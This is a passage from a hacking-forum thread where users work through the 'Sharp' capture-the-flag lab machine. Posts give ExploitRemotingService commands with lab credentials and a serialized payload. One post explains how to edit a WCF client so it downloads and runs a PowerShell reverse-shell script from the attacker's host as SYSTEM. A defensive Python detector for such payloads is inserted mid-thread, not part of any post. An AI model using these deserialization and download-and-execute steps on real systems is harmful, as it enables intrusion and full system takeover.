TUTORIAL Sharp
by Eve01 - December 07, 2020 at 09:58 PM
#25
(December 10, 2020 at 01:45 PM)Kali76 Wrote:
(December 10, 2020 at 12:31 PM)CyberBandit Wrote:
(December 09, 2020 at 01:13 AM)Kali76 Wrote:
(December 09, 2020 at 01:07 AM)orangutang Wrote: Need to make exe file? And it work from windows machine?

need visual studio 2019 on windows and compile file

Any compilation errors??

I get, 

Severity Code Description Project File Line Suppression State

Error CS0246 The type or namespace name 'NDesk' could not be found (are you missing a using directive or an assembly reference?) ExploitRemotingService C:\Users\source\repos\ExploitRemotingService\ExploitRemotingService\Program.cs 18 Active

Severity Code Description Project File Line Suppression State
Error NuGet Package restore failed for project ExampleRemotingService: Unable to find version '0.2.1' of package 'NDesk.Options'.
  C:\Program Files\Microsoft SDKs\NuGetPackages\: Package 'NDesk.Options.0.2.1' is not found on source 'C:\Program Files\Microsoft SDKs\NuGetPackages\'.
  https://api.nuget.org/v3/index.json: Unable to load the service index for source https://api.nuget.org/v3/index.json.
  An error occurred while sending the request.
  The underlying connection was closed: Could not establish trust relationship for the SSL/TLS secure channel.
  The remote certificate is invalid according to the validation procedure.
. Please see Error List window for detailed warnings and errors.


I tried both cloning the GIT and downloading the zip from https://github.com/tyranid/ExploitRemotingService

open this file with vs studio 2019 and compile:

ExploitRemotingService.csproj


\ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint  AAEAAAD/////
 
it only worked once now keep getting this error
Detected version 4 server
System.Security.Authentication.InvalidCredentialException: The server has rejected the client credentials. ---> System.ComponentModel.Win32Exception: The logon attempt failed
  --- End of inner exception stack trace ---

Server stack trace:
  at System.Net.Security.NegoState.ProcessReceivedBlob(Byte[] message, LazyAsyncResult lazyResult)
  at System.Net.Security.NegoState.StartSendBlob(Byte[] message, LazyAsyncResult lazyResult)
  at System.Net.Security.NegoState.StartSendBlob(Byte[] message, LazyAsyncResult lazyResult)
  at System.Net.Security.NegoState.ProcessAuthentication(LazyAsyncResult lazyResult)
  at System.Net.Security.NegotiateStream.AuthenticateAsClient(NetworkCredential credential, String targetName, ProtectionLevel requiredProtectionLevel, TokenImpersonationLevel allowedImpersonationLevel)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.CreateAuthenticatedStream(Stream netStream, String machinePortAndSid)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.CreateSocketHandler(Socket socket, SocketCache socketCache, String machinePortAndSid)
  at System.Runtime.Remoting.Channels.SocketCache.GetSocket(String machinePortAndSid, Boolean openNew)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.SendRequestWithRetry(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream)
  at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.ProcessMessage(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream, ITransportHeaders& responseHeaders, Stream& responseStream)
  at System.Runtime.Remoting.Channels.BinaryClientFormatterSink.SyncProcessMessage(IMessage msg)

Exception rethrown at [0]:
  at System.Runtime.Remoting.Proxies.RealProxy.HandleReturnMessage(IMessage reqMsg, IMessage retMsg)
  at System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type)
  at System.Object.ToString()
  at ExploitRemotingService.Program.CreateRemoteClassExploit(CustomChannel channel) in C:\ExploitRemotingService-master\ExploitRemotingService\Program.cs:line 356
  at ExploitRemotingService.Program.Main(String[] args) in C:\ExploitRemotingService-master\ExploitRemotingS
#26
(December 11, 2020 at 09:50 PM)B3Wild3R Wrote:
(December 11, 2020 at 09:11 PM)Kali76 Wrote:
(December 11, 2020 at 08:12 PM)B3Wild3R Wrote: For root, zip the wcf folder located in C:\Users\Lars\Documents\.

You can use Powershell and the "Compress-Archive" cmdlet
i.e.:
Compress-Archive -Path C:\Reference -DestinationPath C:\Archives\Draft.zip

Unpack the archive and open the solution in VS Studio.

Edit the client main function in the below section:


using RemotingSample;
using System;
using System.ServiceModel;

namespace Client {

    public class Client
    {
        public static void Main() {
            ChannelFactory<IWcfService> channelFactory = new ChannelFactory<IWcfService>(
                new NetTcpBinding(SecurityMode.Transport),"net.tcp://localhost:8889/wcf/NewSecretWcfEndpoint"
            );
            IWcfService client = channelFactory.CreateChannel();
            Console.WriteLine(client.GetDiskInfo());
            Console.WriteLine(client.GetCpuInfo());
            Console.WriteLine(client.GetRamInfo());
        }
    }
}

and add the following

Console.WriteLine(Client.InvokePowerShell(" iex (new-object net.webclient).downloadstring('http://yourip:port/Invoke-PowerShellTcpOneLine.ps1')"))
So that the above section reads as below:

            Console.WriteLine(client.GetDiskInfo());
            Console.WriteLine(client.GetCpuInfo());
            Console.WriteLine(client.GetRamInfo());
            Console.WriteLine(Client.InvokePowerShell(" iex (new-object net.webclient).downloadstring('http://yourip:port/Invoke-PowerShellTcpOneLine.ps1')"));

Compile the client and upload the client along with the DLL to the victim machine. Execute the client and you will get connection back from the victim machine and eventually spawn your reverse shell as SYSTEM.

ok thanks bro, how do i decompile with visual studio?  what if i use dnspy is the same? another thing, after I have recompiled all the files, including the .config, or is the dll enough?

You don't need to decompile the binary. You compress the wcf folder, uncompress it on your local machine, open the .sln file and edit the main function of the Client as I described earlier. Then build the solution and win :)

"client does not contain definition for InvokePowerShell" how to get this?
#27
Hi everybody again. On virtual machine (VMware player) with windows7 installed python, allowed it (net), switched off windows defender and firewall. But i got result: "System.Security.Authentication.InvalidCredentialException , Server denied client credentials, Login attempt failed". What is wrong?
#28
(December 12, 2020 at 09:53 AM)orangutang Wrote: Hi everybody again. On virtual machine (VMware player) with windows7 installed python, allowed it (net), switched off windows defender and firewall. But i got result: "System.Security.Authentication.InvalidCredentialException , Server denied client credentials, Login attempt failed". What is wrong?
same ................it's not even getting any req on my py server
can't even get result of user or ver command
#29
(December 12, 2020 at 06:24 AM)0x2019 Wrote:
(December 10, 2020 at 01:45 PM)Kali76 Wrote:
(December 10, 2020 at 12:31 PM)CyberBandit Wrote:
(December 09, 2020 at 01:13 AM)Kali76 Wrote:
(December 09, 2020 at 01:07 AM)orangutang Wrote: Need to make exe file? And it work from windows machine?


Hi,
I have the same problem... did you find a possible solution?
#30
It is impossible for me to compile the files. Always errors in ExploitRemotingService but ok for ExampleRemotingService...
Any one can explain if it is possible to download the .exe compiled?
#31
(December 13, 2020 at 08:48 PM)phneutro Wrote: It is impossible for me to compile the files. Always errors in ExploitRemotingService but ok for ExampleRemotingService...
Any one can explain if it is possible to download the .exe compiled?

https://github.com/theralfbrown/ExploitR...e-binaries
#32
Thanks a lot! That was exactly what I needed.
#33
Hi, when i'm running the command
ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint
i always get this error, what am i missing?

Error, couldn't detect version, using host: 4.0.30319.42000
Detected version 4 server
System.Security.Authentication.InvalidCredentialException: The server has rejected the client credentials. ---> System.ComponentModel.Win32Exception: The logon attempt failed
--- End of inner exception stack trace ---

Server stack trace:
at System.Net.Security.NegoState.ProcessReceivedBlob(Byte[] message, LazyAsyncResult lazyResult)
at System.Net.Security.NegoState.StartSendBlob(Byte[] message, LazyAsyncResult lazyResult)
at System.Net.Security.NegoState.StartSendBlob(Byte[] message, LazyAsyncResult lazyResult)
at System.Net.Security.NegoState.ProcessAuthentication(LazyAsyncResult lazyResult)
at System.Net.Security.NegotiateStream.AuthenticateAsClient(NetworkCredential credential, String targetName, ProtectionLevel requiredProtectionLevel, TokenImpersonationLevel allowedImpersonationLevel)
at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.CreateAuthenticatedStream(Stream netStream, String machinePortAndSid)
at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.CreateSocketHandler(Socket socket, SocketCache socketCache, String machinePortAndSid)
at System.Runtime.Remoting.Channels.SocketCache.GetSocket(String machinePortAndSid, Boolean openNew)
at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.SendRequestWithRetry(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream)
at System.Runtime.Remoting.Channels.Tcp.TcpClientTransportSink.ProcessMessage(IMessage msg, ITransportHeaders requestHeaders, Stream requestStream, ITransportHeaders& responseHeaders, Stream& responseStream)
at System.Runtime.Remoting.Channels.BinaryClientFormatterSink.SyncProcessMessage(IMessage msg)

Exception rethrown at [0]:
at System.Runtime.Remoting.Proxies.RealProxy.HandleReturnMessage(IMessage reqMsg, IMessage retMsg)
at System.Runtime.Remoting.Proxies.RealProxy.PrivateInvoke(MessageData& msgData, Int32 type)
at System.Object.ToString()
at ExploitRemotingService.Program.CreateRemoteClass()
at ExploitRemotingService.Program.Main(String[] args)
#34
I am trying to run this and getting error can someone help me? I am stuck here for too long now
My Command: .\ExampleRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw

Command Output:

Example .NET Remoting Server
Copyright © James Forshaw 2014
.NET Version: 4.0.30319.42000
Enable Transparent Proxy Fix: False
Custom Errors Mode: Off
Type Filter Level: Low
Any Bind: False
System.Net.Sockets.SocketException (0x80004005): An attempt was made to access a socket in a way forbidden by its access permissions
at System.Net.Sockets.Socket.DoBind(EndPoint endPointSnapshot, SocketAddress socketAddress)
at System.Net.Sockets.Socket.Bind(EndPoint localEP)
at System.Net.Sockets.TcpListener.Start(Int32 backlog)
at System.Runtime.Remoting.Channels.ExclusiveTcpListener.Start(Boolean exclusiveAddressUse)
at System.Runtime.Remoting.Channels.Tcp.TcpServerChannel.StartListening(Object data)
at System.Runtime.Remoting.Channels.Tcp.TcpServerChannel.SetupChannel()
at System.Runtime.Remoting.Channels.Tcp.TcpServerChannel..ctor(IDictionary properties, IServerChannelSinkProvider sinkProvider, IAuthorizeRemotingConnection authorizeCallback)
at System.Runtime.Remoting.Channels.Tcp.TcpChannel..ctor(IDictionary properties, IClientChannelSinkProvider clientSinkProvider, IServerChannelSinkProvider serverSinkProvider)
at ExampleRemotingService.Program.Main(String[] args) in C:\Users\Commando\Documents\ExploitRemotingService\ExampleRemotingService\Program.cs:line 107
#35
I am getting an error while running this command. Can anyone help me with this?
.\ExploitRemotingService.exe -s --user=debug --pass="SharpApplicationDebugUserPassword123!" tcp://10.10.10.219:8888/SecretSharpDebugApplicationEndpoint raw AAEAAAD/////AQAAAAAAAAAMAgAAAE

error : 
System.InvalidCastException: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'System.Runtime.Remoting.Messaging.IMessage'.
  at System.Runtime.Remoting.Channels.CoreChannel.DeserializeBinaryRequestMessage(String objectUri, Stream inputStream, Boolean bStrictBinding, TypeFilterLevel securityLevel)
  at System.Runtime.Remoting.Channels.BinaryServerFormatterSink.ProcessMessage(IServerChannelSinkStack sinkStack, IMessage requestMsg, ITransportHeaders requestHeaders, Stream requestStream, IMessage& responseMsg, ITransportHeaders& responseHeaders, Stream& responseStream)
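Added detection example, not part of any post in this thread and not code from the ExploitRemotingService project: the `raw AAEAAAD/////...` argument in the commands above is the base64 form of a .NET BinaryFormatter (MS-NRBF) stream header, so it can be flagged in process-creation or proxy logs. The function names and log lines are constructed for illustration; the clipped token is the one quoted in post #35.

```python
import base64
import re
import struct

# Leading bytes of an MS-NRBF SerializationHeaderRecord as BinaryFormatter
# normally writes it: record type 0, RootId 1, HeaderId -1.
NRBF_PREFIX = bytes.fromhex("0001000000ffffffff")
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{12,}={0,2}")
RECORD_NAMES = {0x04: "SystemClassWithMembersAndTypes",
                0x05: "ClassWithMembersAndTypes",
                0x0C: "BinaryLibrary", 0x15: "MethodCall"}

def decode_token(token):
    """Decode base64 even when a log field clipped it mid-quantum."""
    body = token if len(token) % 4 == 0 else token.rstrip("=")
    body = body[: len(body) - len(body) % 4]
    try:
        return base64.b64decode(body)
    except ValueError:
        return b""

def inspect_token(token):
    """Return a finding dict if the token decodes to a BinaryFormatter stream."""
    raw = decode_token(token)
    if not raw.startswith(NRBF_PREFIX):
        return None
    finding = {"token_start": token[:12], "decoded_len": len(raw),
               "confidence": "prefix-only", "next_record": None}
    if len(raw) >= 17:
        # MajorVersion must be 1 and MinorVersion 0 in a valid stream header.
        if struct.unpack_from("<ii", raw, 9) != (1, 0):
            return None
        finding["confidence"] = "full-header"
    if len(raw) >= 18:
        finding["next_record"] = RECORD_NAMES.get(raw[17], hex(raw[17]))
    return finding

def scan_lines(lines):
    """Check every base64-looking token on every line; return the findings."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        for match in B64_TOKEN.finditer(line):
            finding = inspect_token(match.group())
            if finding:
                hits.append({"line": lineno, **finding})
    return hits

# Constructed process-creation log lines (not captured data).
BAD_VERSION = base64.b64encode(NRBF_PREFIX + struct.pack("<ii", 2, 0)).decode()
SAMPLE_LOG = [
    r"CommandLine=.\ExploitRemotingService.exe -s tcp://10.10.10.219:8888/"
    r"SecretSharpDebugApplicationEndpoint raw AAEAAAD/////AQAAAAAAAAAMAgAAAE",
    "CommandLine=curl -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiJ9' https://intranet.example/",
    "CommandLine=tool.exe raw AAEAAAD/////",
    "CommandLine=tool.exe raw " + BAD_VERSION,
]

if __name__ == "__main__":
    for hit in scan_lines(SAMPLE_LOG):
        print(hit)
```

The scan only recognises a stream that starts at the beginning of a base64 token; a payload embedded at an offset inside a larger blob needs a byte-level search after decoding.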
#36
(December 11, 2020 at 09:50 PM)B3Wild3R Wrote:
(December 11, 2020 at 09:11 PM)Kali76 Wrote:
(December 11, 2020 at 08:12 PM)B3Wild3R Wrote: For root, zip the wcf folder located in C:\Users\Lars\Documents\.


hey bro can you help me with this how i can transfer the wcf folder back to my system?
